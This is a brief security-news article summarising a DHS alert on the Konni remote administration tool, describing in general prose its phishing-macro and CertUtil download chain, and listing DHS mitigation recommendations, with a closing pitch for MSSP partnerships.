Cybercriminals are increasingly using Konni, a remote administration tool (RAT), to launch malware attacks, according to a security warning issued by the U.S. Department of Homeland Security (DHS). Along with the Konni malware warning, the National Security Administration (NSA) and Federal Bureau of Investigation (FBI) this month issued a security warning regarding cybercriminals' use of Drovorub, a Russian malware strain.
Konni enables cybercriminals to steal files, capture keystrokes, take screenshots and execute arbitrary code on infected hosts ,DHS stated. During Konni malware attacks, cybercriminals often leverage phishing emails as a Microsoft Word document with a malicious VBA macro code. The malicious code can change the font color from light grey to black, determine if an end-user is utilizing a 32- or 64-bit version of Windows and construct and execute a command line to download additional files.
After Konni malware's VBA macro constructs a command line, it uses the CertUtil certificate database tool to download remote files from a given Uniform Resource Locator, DHS indicated. The malware then incorporates a built-in function to decode base64-encoded files, downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file, deletes the text file from the temp directory and executes the .BAT file.
How to Mitigate Konni Malware Attacks
DHS offers security recommendations to help organizations mitigate Konni malware attacks, including:
- Keep antivirus software and operating system patches up to date
- Deactivate file and printer sharing services
- Limit end-user permissions and prevent users from installing and running unwanted software applications
- Develop and implement a password policy
- Encourage employees to proceed with caution when they open email attachments; workers should not open email attachments from unknown senders
- Leverage firewalls
- Track users' web browsing habits
Furthermore, cybercriminals encrypted data in two-thirds of malware attacks in the first quarter of 2020, research from network security provider WatchGuard revealed. By partnering with MSSPs, organizations can guard against Konni malware and other cyberattacks and limit the risk that their data is stolen and encrypted during these attacks.